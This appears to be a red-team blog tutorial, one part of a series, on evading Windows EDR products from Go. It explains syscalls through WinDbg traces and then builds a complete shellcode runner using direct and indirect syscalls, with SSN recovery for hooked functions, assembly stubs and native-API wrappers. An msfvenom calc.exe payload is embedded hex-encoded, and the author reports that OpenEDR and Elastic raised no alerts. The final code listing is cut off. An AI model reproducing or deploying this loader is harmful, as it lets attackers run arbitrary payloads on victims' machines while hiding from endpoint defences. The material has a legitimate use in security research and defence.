4. Direct and Indirect Syscalls (shellcode runner)

#syscalls #directsyscalls #indirectsyscalls #Golang #EDREvasion

Intro

In the previous section we worked on a piece of code to detect if ntdll.dll was hooked by the EDR installed on the machine.

Once a hook is detected we have a few choices. We could replace the hook bytes with the original bytes by calculating the SSN. This is a similar approach to loading a fresh copy from disk; the only difference is that we don't remap the whole DLL, we just unhook the functions of interest. The issue with this approach is that we still have to modify the DLL in memory, which means using suspicious WinAPIs such as VirtualProtect(Ex), WriteProcessMemory, etc. Another issue with this approach is that these functions themselves might be hooked.

This is where the Direct and Indirect syscalls come in handy.

What is a syscall ?

Sequence of events when calling windows APIs

Before going into detail on what a syscall is let's analyze the sequence of events that take place when a simple windows API function is called. The following code is used for analysis.

func main() {
	PROCESS_ALL_ACCESS := 0x1F0FFF
	time.Sleep(30 * time.Second)
	println("run")
	pHandle, _ := windows.OpenProcess(uint32(PROCESS_ALL_ACCESS), false, 9340)
	windows.CloseHandle(pHandle)
}

All we do in this code is sleep for 30 seconds (just to have enough time to attach WinDbg and set our breakpoints), get a handle on a process, and then close the handle.

When we try to set a breakpoint on kernel32!OpenProcess we get the following error

0:006> bp kernel32!OpenProcess
Couldn't resolve error at 'kernel32!OpenProcess'

To list all functions starting with O in kernel32 we use the following command

0:006> x /D /f KERNEL32!o*
 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

00007ffa`9aa83a32 KERNEL32!OpenFile$fin$0 (void)
00007ffa`9aa36330 KERNEL32!OOBEComplete (void)
00007ffa`9aa2832c KERNEL32!OpenSortIdKey (void)
00007ffa`9aa37e20 KERNEL32!OOBECompleteWnfQueryCallback (void)
00007ffa`9aa896c0 KERNEL32!OOBECompleteWnfWaitCallback (void)
00007ffa`9aa39260 KERNEL32!OpenFileMappingWStub (OpenFileMappingWStub)
00007ffa`9aa40340 KERNEL32!OpenWaitableTimerW (OpenWaitableTimerW)
00007ffa`9aa39640 KERNEL32!OutputDebugStringWStub (OutputDebugStringWStub)
00007ffa`9aa40300 KERNEL32!OpenEventA (OpenEventA)
00007ffa`9aa8b440 KERNEL32!OpenConsoleW (OpenConsoleW)
00007ffa`9aa39720 KERNEL32!OutputDebugStringAStub (OutputDebugStringAStub)
00007ffa`9aa846b0 KERNEL32!OpenWaitableTimerA (OpenWaitableTimerA)
00007ffa`9aa34730 KERNEL32!OpenProcessStub (OpenProcessStub)
00007ffa`9aa40310 KERNEL32!OpenEventW (OpenEventW)
00007ffa`9aa834e0 KERNEL32!OpenFile (OpenFile)
00007ffa`9aa82e70 KERNEL32!OpenPrivateNamespaceA (OpenPrivateNamespaceA)
00007ffa`9aa5be60 KERNEL32!OpenConsoleWStub (OpenConsoleWStub)
00007ffa`9aa39e00 KERNEL32!OpenProfileUserMapping (OpenProfileUserMapping)
00007ffa`9aa845b0 KERNEL32!OpenMutexA (OpenMutexA)
00007ffa`9aa7cc50 KERNEL32!OpenJobObjectA (OpenJobObjectA)
00007ffa`9aa5be70 KERNEL32!OpenPrivateNamespaceWStub (OpenPrivateNamespaceWStub)
00007ffa`9aa40330 KERNEL32!OpenSemaphoreW (OpenSemaphoreW)
00007ffa`9aa470e0 KERNEL32!OpenFileMappingA (OpenFileMappingA)
00007ffa`9aa7ccd0 KERNEL32!OpenJobObjectW (OpenJobObjectW)
00007ffa`9aa84630 KERNEL32!OpenSemaphoreA (OpenSemaphoreA)
00007ffa`9aa369b0 KERNEL32!OpenThreadStub (OpenThreadStub)
00007ffa`9aa40320 KERNEL32!OpenMutexW (OpenMutexW)
00007ffa`9aa46ca0 KERNEL32!OpenFileByIdStub (OpenFileByIdStub)

What we are interested in here is setting a breakpoint on KERNEL32!OpenProcessStub at 00007ffa`9aa34730 (line 16 of the output above). We will then follow execution to understand what happens.

Let's set a breakpoint in windbg using the following command

0:006> bp KERNEL32!OpenProcessStub

Then sending the command g resumes execution until our breakpoint is hit.

0:006> g
Breakpoint 0 hit
*** WARNING: Unable to verify timestamp for C:\Users\ALEXAN~1\AppData\Local\Temp\go-build3312435584\b001\exe\OpenProc.exe
KERNEL32!OpenProcessStub:
00007ffa`9aa34730 48ff25490a0700  jmp     qword ptr [KERNEL32!_imp_OpenProcess (00007ffa`9aaa5180)] ds:00007ffa`9aaa5180={KERNELBASE!OpenProcess (00007ffa`998bc580)}

The jmp instruction on line 5 directs execution to the address held at 00007ffa`9aaa5180, which is the address of kernelbase!OpenProcess.

0:000> dq 00007ffa`9aaa5180 L1 
00007ffa`9aaa5180  00007ffa`998bc580
0:000> u 00007ffa`998bc580
KERNELBASE!OpenProcess:
00007ffa`998bc580 4c8bdc          mov     r11,rsp
00007ffa`998bc583 4883ec68        sub     rsp,68h

So far we called the OpenProcess api from kernel32 which forwards our request to kernelbase to execute. So where do syscalls come in?

Let's dig further into the kernelbase where the actual implementation of the OpenProcess function is.

KERNELBASE!OpenProcess:
00007ffa`998bc580 4c8bdc          mov     r11,rsp
00007ffa`998bc583 4883ec68        sub     rsp,68h
00007ffa`998bc587 498363c000      and     qword ptr [r11-40h],0
00007ffa`998bc58c 4d8d4bb8        lea     r9,[r11-48h]
00007ffa`998bc590 4963c0          movsxd  rax,r8d
00007ffa`998bc593 0f57c0          xorps   xmm0,xmm0
00007ffa`998bc596 c744243030000000 mov     dword ptr [rsp+30h],30h
00007ffa`998bc59e 4d8d43c8        lea     r8,[r11-38h]
00007ffa`998bc5a2 498363d000      and     qword ptr [r11-30h],0
00007ffa`998bc5a7 f7da            neg     edx
00007ffa`998bc5a9 498943b8        mov     qword ptr [r11-48h],rax
00007ffa`998bc5ad 8bd1            mov     edx,ecx
00007ffa`998bc5af 498d4b20        lea     rcx,[r11+20h]
00007ffa`998bc5b3 1bc0            sbb     eax,eax
00007ffa`998bc5b5 83e002          and     eax,2
00007ffa`998bc5b8 89442448        mov     dword ptr [rsp+48h],eax
00007ffa`998bc5bc 498363d800      and     qword ptr [r11-28h],0
00007ffa`998bc5c1 f30f7f442450    movdqu  xmmword ptr [rsp+50h],xmm0
00007ffa`998bc5c7 48ff15fa362300  call    qword ptr [KERNELBASE!_imp_NtOpenProcess (00007ffa`99aefcc8)]
00007ffa`998bc5ce 0f1f440000      nop     dword ptr [rax+rax]
00007ffa`998bc5d3 85c0            test    eax,eax
00007ffa`998bc5d5 780e            js      KERNELBASE!OpenProcess+0x65 (00007ffa`998bc5e5)
00007ffa`998bc5d7 488b842488000000 mov     rax,qword ptr [rsp+88h]
00007ffa`998bc5df 4883c468        add     rsp,68h
00007ffa`998bc5e3 c3              ret

Line 20: we can see another call which eventually takes us to ntdll!NtOpenProcess

NtOpenProcess in the ntdll.dll is where the syscall resides.

00007ffa`9c12f203 b826000000      mov     eax,26h
00007ffa`9c12f208 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffa`9c12f210 7503            jne     ntdll!NtOpenProcess+0x15 (00007ffa`9c12f215)
00007ffa`9c12f212 0f05            syscall
00007ffa`9c12f214 c3              ret
00007ffa`9c12f215 cd2e            int     2Eh
00007ffa`9c12f217 c3              ret

So here comes the question again. What is a syscall and what does it actually do ?

Under the hood, when a user-mode application calls one of these API functions, the Windows kernel handles the actual system call invocation. The transition from user mode to kernel mode is typically managed through a mechanism called a software interrupt or a similar mechanism.

So in order to get a handle on a process we don't really have to call any of the three functions. All we have to do is follow the x64 calling convention to prepare our registers and the stack, move 0x26 (for this particular version of Windows) into eax and execute the syscall instruction.

The benefit of directly (or indirectly) calling the syscall instruction is that any EDR that relies on userland hooks for detection will be bypassed.

Direct or Indirect Syscalls.

Direct Syscalls

What "direct syscalls" means is that an asm function is written within our executable that executes the syscall instruction directly. Since syscalls are normally only issued from ntdll.dll, a syscall coming from any other module is likely to be malicious, or at least to be flagged as anomalous.

Direct Syscalls have served us well. One of the early articles I remember reading regarding syscalls was this one from outflank written back in 2019. Although direct syscalls are effective to this day EDR vendors started catching up with the technique (elastic detection of Direct Syscall via Assembly Bytes).

The detection essentially checks if the following sequence of instructions is called from any other module other than ntdll. If that's the case it's flagged as malicious.

mov r10,rcx; 
mov eax,ssn;
syscall;

Indirect Syscalls

The easiest way around this detection is to find the location of syscall within ntdll.dll and instead of directly calling syscall in our assembly function we instead use the call instruction to call the address within the ntdll that holds syscall. In our example above the function will look something like this:

mov r10,rcx; 
mov eax,ssn;
call addr;

In the previous blog we stored an address value in a variable called "trampoline". The trampoline variable was the syscall instruction address for each exported function of the ntdll.

With all the knowledge we have now let's write the shellcode runner using both direct and indirect syscalls.

Shellcode Runner using direct and indirect syscalls

Before we start writing our shellcode runner we need to modify our code first to perform the following:

  • Calculate the SSNs of the hooked functions using the adjacent unhooked functions

    • We can do this by sorting all functions by their address

    • The SSNs are sequential for both Zw and Nt functions

    • Find the last unhooked function and extrapolate the values

  • Develop the assembly functions to call the syscalls / indirect syscalls

  • Write wrapper functions to call from our golang main function

Let's continue from where we left off.

Calculate the SSNs of the hooked functions using the adjacent unhooked functions

It is fairly easy to find the unhooked values since we keep our values in a slice. We will loop through the values in the slice and if a function is hooked we will increase the SSN of the previous value by 1.

Here is the unhooking function.

	for i, fun := range dll.exportedNtFunctions {
		if fun.isHooked {
			dll.exportedNtFunctions[i].syscallno = dll.exportedNtFunctions[i-1].syscallno + 1
			dll.exportedNtFunctions[i].isHooked = false
		}
	}

As mentioned earlier we could restore the value in memory but that would require changing memory permissions therefore more opportunities for the defenders to be alerted.

In our main function we run the UnhookFuncs function and print the exports again on the host running OpenEDR.

	dll.PrintExports()
	dll.UnhookFuncs()
	dll.PrintExports()

Let's cross-check that the value 0x33 is the correct SSN for NtOpenFile against another identical Windows host that is not running an EDR.

We have programmatically managed to get the correct SSN values of the hooked functions. We are now ready to start building the assembly functions that perform direct and indirect syscalls.

Assembly Functions

Since writing assembly is not the aim of this blog post I will not go in too much detail about it. If this is a subject of interest you can review the go documentation and the plan 9 assembler manual. Also keep an eye out for my upcoming goASM blog.

For the sake of simplicity we will take the ASM functions from two existing projects.

  1. Direct Syscall Function from BananaPhone Project is located here

  2. Indirect Syscall Function from acheron project is located here

Both of these functions are essentially modified versions of the Golang function (asmstdcall) used to perform windows API calls.

Let's have a quick look at the direct syscall function

//based on https://golang.org/src/runtime/sys_windows_amd64.s
#define maxargs 16
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·bpSyscall(SB), $0-56
	XORQ AX,AX
	MOVW callid+0(FP), AX
	PUSHQ CX
	//put variadic size into CX
	MOVQ argh_len+16(FP),CX
	//put variadic pointer into SI
	MOVQ argh_base+8(FP),SI
	// SetLastError(0).
	MOVQ	0x30(GS), DI
	MOVL	$0, 0x68(DI)
	SUBQ	$(maxargs*8), SP	// room for args
	// Fast version, do not store args on the stack.
	CMPL	CX, $4
	JLE	loadregs
	// Check we have enough room for args.
	CMPL	CX, $maxargs
	JLE	2(PC)
	INT	$3			// not enough room -> crash
	// Copy args to the stack.
	MOVQ	SP, DI
	CLD
	REP; MOVSQ
	MOVQ	SP, SI
loadregs:
	//move the stack pointer????? why????
	SUBQ	$8, SP
	// Load first 4 args into correspondent registers.
	MOVQ	0(SI), CX
	MOVQ	8(SI), DX
	MOVQ	16(SI), R8
	MOVQ	24(SI), R9
	// Floating point arguments are passed in the XMM
	// registers. Set them here in case any of the arguments
	// are floating point values. For details see
	//	https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
	MOVQ	CX, X0
	MOVQ	DX, X1
	MOVQ	R8, X2
	MOVQ	R9, X3
	//MOVW callid+0(FP), AX
	MOVQ CX, R10
	SYSCALL
	ADDQ	$((maxargs+1)*8), SP
	// Return result.
	POPQ	CX
	MOVL	AX, errcode+32(FP)
	RET

Before we dive into the assembly let's note the main differences between Go ASM and what we will see in WinDbg (Intel syntax).

The function receives a uint16 as an argument. That is the SSN of the syscall we want to perform. The rest of the uintptrs are the arguments passed to the function

  • Line 5 sets the RAX register to 0 by performing the xor operation.

  • Line 6 moves the value of the first argument to RAX essentially recreating the mov eax,33 we have seen in the ntdll exported functions.

  • Line 7 takes the number of arguments into RCX.

  • Lines 17-45: It basically checks how many arguments were passed to the function and follows the x64 calling convention. First 4 arguments passed to the registers RCX, RDX,R8,R9 and the rest are stored in the stack.

  • Line 46 is where the syscall instruction is called.

The indirect syscall function is very similar:

// func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) uint32
TEXT ·execIndirectSyscall(SB),NOSPLIT, $0-40
    XORQ    AX, AX
    MOVW    ssn+0(FP), AX
	
    XORQ    R11, R11
    MOVQ    trampoline+8(FP), R11
	
    PUSHQ   CX
	
    //put variadic pointer into SI
    MOVQ    argh_base+16(FP),SI

    //put variadic size into CX
    MOVQ    argh_len+24(FP),CX
	
    // SetLastError(0).
    MOVQ    0x30(GS), DI
    MOVL    $0, 0x68(DI)

    // room for args
    SUBQ    $(maxargs*8), SP	

    //no parameters, special case
    CMPL    CX, $0
    JLE     jumpcall
	
    // Fast version, do not store args on the stack.
    CMPL    CX, $4
    JLE	    loadregs

    // Check we have enough room for args.
    CMPL    CX, $maxargs
    JLE	    2(PC)

    // not enough room -> crash
    INT	    $3			

    // Copy args to the stack.
    MOVQ    SP, DI
    CLD
    REP; MOVSQ
    MOVQ    SP, SI
	
loadregs:

    // Load first 4 args into correspondent registers.
    MOVQ	0(SI), CX
    MOVQ	8(SI), DX
    MOVQ	16(SI), R8
    MOVQ	24(SI), R9
	
    // Floating point arguments are passed in the XMM registers
    // Set them here in case any of the arguments are floating point values. 
    // For details see: https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
    MOVQ	CX, X0
    MOVQ	DX, X1
    MOVQ	R8, X2
    MOVQ	R9, X3
	
jumpcall:
    MOVQ    CX, R10

    //jump to syscall;ret gadget address instead of direct syscall
    CALL    R11

    ADDQ	$((maxargs)*8), SP

    // Return result
    POPQ	CX
    MOVL	AX, errcode+40(FP)
    RET

The main differences are:

  • In addition to the ssn it receives a trampoline argument which is the address of the syscall;ret; located in ntdll.dll

  • Line 7: The trampoline address is stored in the R11 register

  • Line 65: Instead of using the syscall instruction directly we use the CALL R11 instruction, which calls the syscall instruction located in ntdll.dll

Wrapper Functions for our assembly functions

In order to be able to call the assembly functions in Go we need to save them in the same directory as our code. Since our functions will only work on x64 the file name should end with _amd64.s. If a 32-bit implementation of the function was present we would have to create a separate file ending with _386.s (Go's name for the 32-bit x86 architecture is 386). The suffix lets the compiler know the target architecture of the assembly functions.

In our code we should also define the functions without a body

func execIndirectSyscall(ssn uint16, trampoline uintptr, argh ...uintptr) (errcode uint32)

func bpSyscall(ssn uint16, argh ...uintptr) (errcode uint32)

That's all needed before we can call the functions.

We will then write a wrapper function that receives the ntapi function as a string and the function arguments. It will then resolve the ssn and trampoline as needed before calling our assembly function.

func (dll *dllstruct) IndirectSyscall(ntapi string, argh ...uintptr) (errcode uint32, err error) {
	var ssn uint16 = 0
	var trampoline uintptr = 0

	if strings.HasPrefix(ntapi, "Nt") {
		for _, fun := range dll.exportedNtFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else if strings.HasPrefix(ntapi, "Zw") {
		for _, fun := range dll.exportedZwFunctions {
			if fun.name == ntapi {
				ssn = fun.syscallno
				trampoline = fun.trampoline
				break
			}
		}

	} else {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	if ssn == 0 && trampoline == 0 {
		return 0, fmt.Errorf("Invalid NT Api function\n")
	}

	fmt.Printf("Calling Indirect syscall: %s SSN: %x Trampoline: %x\n", ntapi, ssn, trampoline)
	errcode = execIndirectSyscall(ssn, trampoline, argh...)
	if errcode != 0 {
		err = fmt.Errorf("non-zero return from syscall")
	}
	return errcode, err
}

Shellcode Runner code

In order to create our shellcode runner the following native APIs should be called:

  1. NtAllocateVirtualMemory (== VirtualAlloc)

  2. rtlMoveMemory

  3. NtProtectVirtualMemory (== VirtualProtect)

  4. NtCreateThreadEx (==CreateThread)

Let's write the functions one by one. At this point using direct or indirect syscalls has no difference at all. We just have to call the respective function(IndirectSyscall or Syscall) and the code will do the work for us. We will run both implementations against openEDR and elasticEDR to see if any alerts are generated.

Let's create a wrapper function for each ntAPI

NtAllocateVirtualMemory

The arguments passed are identical to the VirtualAlloc function (which is not always the case).

func (dll *dllstruct) NtAllocateVirtualMemorySyscall(ntapi string, handle uintptr, length uintptr, alloctype int, protect int) (uintptr, error) {
	/*
			__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
		  [in]      HANDLE    ProcessHandle, 1
		  [in, out] PVOID     *BaseAddress,  2
		  [in]      ULONG_PTR ZeroBits,      3
		  [in, out] PSIZE_T   RegionSize,    4
		  [in]      ULONG     AllocationType,5
		  [in]      ULONG     Protect        6
		);*/
	// syscall for NtAllocateVirtualMemory

	var BaseAddress uintptr

	err1, err := dll.IndirectSyscall(
		ntapi,
		uintptr(unsafe.Pointer(handle)),       //1
		uintptr(unsafe.Pointer(&BaseAddress)), //2
		0,                                     //3
		uintptr(unsafe.Pointer(&length)),      //4
		uintptr(alloctype),                    //5
		uintptr(protect),                      //6
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	return BaseAddress, nil
}

The allocated address is stored at the BaseAddress variable defined before the syscall.

The easiest way to check that our stack and registers are correct before the syscall is to set a breakpoint just before the syscall. An easy way to find the address of a function in Go is the following code, which prints the address of IndirectSyscall() in memory. The sleep call will give us enough time to attach to the process and set our breakpoints.

    var ptr uintptr = reflect.ValueOf(IndirectSyscall).Pointer()
    fmt.Printf("0x%x", ptr)
    time.Sleep(30*time.Second)
    
    

In the main function we add the following code to call our wrapper function:

	pHandle := windows.CurrentProcess()
	addr, err := dll.NtAllocateVirtualMemorySyscall("NtAllocateVirtualMemory", 
						uintptr(pHandle), 
						uintptr(len(sc)), 
						windows.MEM_COMMIT|windows.MEM_RESERVE, 
						windows.PAGE_READWRITE)
	if err != nil {
		log.Fatalf("NtAllocateVirtualMemorySyscall: Failed to allocate memory %v\n", err)
	}
	fmt.Printf("	[+] Allocated Memory Address: 0x%x\n", addr)

rtlMoveMemory

We can use the rtlMoveMemory function to copy the bytes stored in the sc slice to the allocated memory.

	sc, _ := hex.DecodeString("fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500")
	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")
	
	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[!] Wrote shellcode bytes to destination address")

NtProtectVirtualMemory

We then use this native api to adjust the memory permissions to RX.

func (dll *dllstruct) NtProtectVirtualMemory(ntapi string, handle, addr uintptr, size uintptr, flNewProtect uintptr, lpflOldProtect uintptr) error {
	err1, err := dll.IndirectSyscall(
		ntapi,
		handle,
		uintptr(unsafe.Pointer(&addr)),
		uintptr(unsafe.Pointer(&size)),
		flNewProtect,
		lpflOldProtect,
	)
	if err != nil {
		return fmt.Errorf("1 %s %x\n", err, err1)
	}
	fmt.Println("	[+] Changed memory permissions to PAGE_EXECUTE_READ")

	return nil
}

In the main function we add this piece of code to call it:

	err = dll.NtProtectVirtualMemory("NtProtectVirtualMemory", uintptr(pHandle), addr, uintptr(len(sc)), uintptr(windows.PAGE_EXECUTE_READ), uintptr(unsafe.Pointer(&oldProtect)))
	if err != nil {
		log.Fatalf("NtProtectVirtualMemory Failed: %v", err)
	}

NtCreateThreadEx

The last and final step is to create a thread pointing to our shellcode.

func (dll *dllstruct) NtCreateThreadEx(ntapi string, handle, BaseAddress uintptr) (uintptr, error) {

	/*
	   typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
	     OUT PHANDLE hThread,               	1
	     IN ACCESS_MASK DesiredAccess,	    	2
	     IN PVOID ObjectAttributes,	        	3
	     IN HANDLE ProcessHandle,		    	4
	     IN PVOID lpStartAddress,			5
	     IN PVOID lpParameter,			6
	     IN ULONG Flags,				7
	     IN SIZE_T StackZeroBits,			8
	     IN SIZE_T SizeOfStackCommit,		9
	     IN SIZE_T SizeOfStackReserve,		10
	     OUT PVOID lpBytesBuffer			11
	   );
	*/

	var hThread uintptr
	DesiredAccess := uintptr(0x1FFFFF)
	err1, err := dll.IndirectSyscall(
		ntapi,
		uintptr(unsafe.Pointer(&hThread)),    //1
		DesiredAccess,                        //2
		0,                                    //3
		uintptr(unsafe.Pointer(handle)),      //4
		uintptr(unsafe.Pointer(BaseAddress)), //5
		0,                                    //6
		uintptr(0),                           //7
		0,                                    //8
		0,                                    //9
		0,                                    //10
		0,				      //11
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	fmt.Printf("	[+] Thread Handle: 0x%v\n", hThread)

	syscall.WaitForSingleObject(syscall.Handle(hThread), 0xffffffff)
	return hThread, nil
}

And in the main function:

	_, err = dll.NtCreateThreadEx("NtCreateThreadEx", uintptr(pHandle), addr)
	if err != nil {
		log.Fatalf("NtCreateThreadEx: Failed to create remote thread %v\n", err)
	}

Detections ?

Using the default rules none of the EDRs generated any alerts other than the process creation.

OpenEDR (22-09-2023)

ElasticEDR (22-09-2023)

Complete Code

Ideally the syscall functionality should be turned into a package and then imported wherever needed.

package main

import (
	"encoding/hex"
	"fmt"
	"log"
	"slices"
	"sort"
	"strings"
	"syscall"
	"unsafe"

	"github.com/jedib0t/go-pretty/v6/table"
	"golang.org/x/sys/windows"
)

// IMAGE_EXPORT_DIRECTORY holds the export-directory fields of the inspected
// module. The trailing comment on each field is its byte offset from the
// start of the structure.
type IMAGE_EXPORT_DIRECTORY struct { //offsets
	Characteristics       uint32 // 0x0
	TimeDateStamp         uint32 // 0x4
	MajorVersion          uint16 // 0x8
	MinorVersion          uint16 // 0xa
	Name                  uint32 // 0xc
	Base                  uint32 // 0x10
	NumberOfFunctions     uint32 // 0x14
	NumberOfNames         uint32 // 0x18
	AddressOfFunctions    uint32 // 0x1c
	AddressOfNames        uint32 // 0x20
	AddressOfNameOrdinals uint32 // 0x24
}
// Exportfunc describes a single exported function of the inspected DLL,
// together with the syscall information derived for it.
type Exportfunc struct {
	funcRVA         uint32  // relative address to the base address of the dll
	functionAddress uintptr // absolute address
	name            string  // name of the exported function
	syscallno       uint16  // SSN
	trampoline      uintptr // syscall ;ret; address location
	isHooked        bool    // Is the function hooked?
}

// dllstruct groups what the program tracks about one loaded DLL: its export
// directory and its exported functions, kept in two separate slices.
type dllstruct struct {
	name string
	// presumably the module's base address in memory — confirm against
	// GetStructOfLoadedDll, which is not shown here.
	address                uintptr
	exportDirectoryAddress uintptr
	exportDirectory        IMAGE_EXPORT_DIRECTORY
	// Searched by Syscall/IndirectSyscall for names with the "Nt" prefix.
	exportedNtFunctions []Exportfunc
	// Searched by Syscall/IndirectSyscall for names with the "Zw" prefix.
	exportedZwFunctions []Exportfunc
}

func main() {
	dll, err := GetStructOfLoadedDll("ntdll.dll")
	if err != nil {
		log.Fatalln(err)
	}

	dll.getExportTableAddress()
	dll.GetImageExportDirectory()
	dll.GetModuleExports()
	dll.UnhookFuncs()

	//// Shellcode runner /////
	//msfvenom -p windows/x64/exec CMD=calc.exe -f hex
	sc, _ := hex.DecodeString("fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500")
	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")

	/*
		1. NtAllocateVirtualMemory == VirtualAlloc
		2. rtlMoveMemory
		3. NtProtectVirtualMemory == VirtualProtect
		4. NtCreateThreadEx == CreateThread
	*/

	pHandle := windows.CurrentProcess()
	addr, err := dll.NtAllocateVirtualMemorySyscall("NtAllocateVirtualMemory", uintptr(pHandle), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil {
		log.Fatalf("NtAllocateVirtualMemorySyscall: Failed to allocate memory %v\n", err)
	}
	fmt.Printf("	[+] Allocated Memory Address: 0x%x\n", addr)

	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[!] Wrote shellcode bytes to destination address")

	var oldProtect uint32

	err = dll.NtProtectVirtualMemory("NtProtectVirtualMemory", uintptr(pHandle), addr, uintptr(len(sc)), uintptr(windows.PAGE_EXECUTE_READ), uintptr(unsafe.Pointer(&oldProtect)))
	if err != nil {
		log.Fatalf("NtProtectVirtualMemory Failed: %v", err)
	}
	_, err = dll.NtCreateThreadEx("NtCreateThreadEx", uintptr(pHandle), addr)
	if err != nil {
		log.Fatalf("NtCreateThreadEx: Failed to create remote thread %v\n", err)
	}

}

// NtCreateThreadEx invokes the native API named by ntapi through dll.Syscall,
// passing the eleven arguments of the prototype quoted below, and then blocks
// until the created thread's handle is signalled.
//
// handle is passed as the ProcessHandle argument and BaseAddress as the
// thread start address; every other optional argument is passed as zero.
//
// It returns the thread handle written by the call. When dll.Syscall reports
// an error, it returns 0 and an error that embeds both the message and the
// raw status code.
func (dll *dllstruct) NtCreateThreadEx(ntapi string, handle, BaseAddress uintptr) (uintptr, error) {

	/*
	   typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
	     OUT PHANDLE hThread,               1
	     IN ACCESS_MASK DesiredAccess,	    2
	     IN PVOID ObjectAttributes,	        3
	     IN HANDLE ProcessHandle,		    4
	     IN PVOID lpStartAddress,			5
	     IN PVOID lpParameter,				6
	     IN ULONG Flags,					7
	     IN SIZE_T StackZeroBits,			8
	     IN SIZE_T SizeOfStackCommit,		9
	     IN SIZE_T SizeOfStackReserve,		10
	     OUT PVOID lpBytesBuffer			11
	   );
	*/

	// Receives the new thread handle (argument 1 is a pointer to it).
	var hThread uintptr
	DesiredAccess := uintptr(0x1FFFFF)
	err1, err := dll.Syscall(
		ntapi,
		uintptr(unsafe.Pointer(&hThread)),    //1
		DesiredAccess,                        //2
		0,                                    //3
		uintptr(unsafe.Pointer(handle)),      //4
		uintptr(unsafe.Pointer(BaseAddress)), //5
		0,                                    //6
		uintptr(0),                           //7
		0,                                    //8
		0,                                    //9
		0,                                    //10
		0,
	)
	if err != nil {
		return 0, fmt.Errorf("1 %s %x\n", err, err1)
	}

	// NOTE(review): %v formats a uintptr in decimal, so the value printed
	// after the "0x" prefix is not hexadecimal.
	fmt.Printf("	[+] Thread Handle: 0x%v\n", hThread)

	// Wait on the thread handle with a timeout of 0xffffffff; the result of
	// the wait is not inspected.
	syscall.WaitForSingleObject(syscall.Handle(hThread), 0xffffffff)
	return hThread, nil
}

// NtProtectVirtualMemory invokes the native API named by ntapi through
// dll.Syscall with five arguments: the process handle, a pointer to addr, a
// pointer to size, the new protection value and lpflOldProtect.
//
// addr and size are passed by pointer to this function's own copies of the
// parameters, so any values the call writes back are not visible to the
// caller. lpflOldProtect is forwarded unchanged.
//
// It returns nil on success, or an error embedding the message and raw status
// code when dll.Syscall reports a failure.
func (dll *dllstruct) NtProtectVirtualMemory(ntapi string, handle, addr uintptr, size uintptr, flNewProtect uintptr, lpflOldProtect uintptr) error {
	err1, err := dll.Syscall(
		ntapi,
		handle,
		uintptr(unsafe.Pointer(&addr)),
		uintptr(unsafe.Pointer(&size)),
		flNewProtect,
		lpflOldProtect,
	)
	if err != nil {
		return fmt.Errorf("1 %s %x\n", err, err1)
	}
	// The message is fixed text; it is printed regardless of the value of
	// flNewProtect.
	fmt.Println("	[+] Changed memory permissions to PAGE_EXECUTE_READ")

	return nil
}

// NtAllocateVirtualMemorySyscall invokes the native API named by ntapi
// through dll.Syscall with the six arguments of the prototype quoted below.
//
// handle is the process handle, length is passed by pointer as RegionSize,
// and alloctype/protect are forwarded as AllocationType/Protect. ZeroBits is
// always 0 and the requested base address starts out as 0.
//
// It returns the base address written back by the call, or 0 and an error
// embedding the message and raw status code when dll.Syscall reports a
// failure.
func (dll *dllstruct) NtAllocateVirtualMemorySyscall(ntapi string, handle uintptr, length uintptr, alloctype int, protect int) (uintptr, error) {
	/*
			__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
		  [in]      HANDLE    ProcessHandle, 1
		  [in, out] PVOID     *BaseAddress,  2
		  [in]      ULONG_PTR ZeroBits,      3
		  [in, out] PSIZE_T   RegionSize,    4
		  [in]      ULONG     AllocationType,5
		  [in]      ULONG     Protect        6
		);*/
	// syscall for NtAllocateVirtualMemory

	// In/out argument 2: zero on entry, holds the returned address on exit.
	var BaseAddress uintptr

	err1, err := dll.Syscall(
		ntapi,
		uintptr(unsafe.Pointer(handle)),       //1
		uintptr(unsafe.Pointer(&BaseAddress)), //2
		0,                                     //3
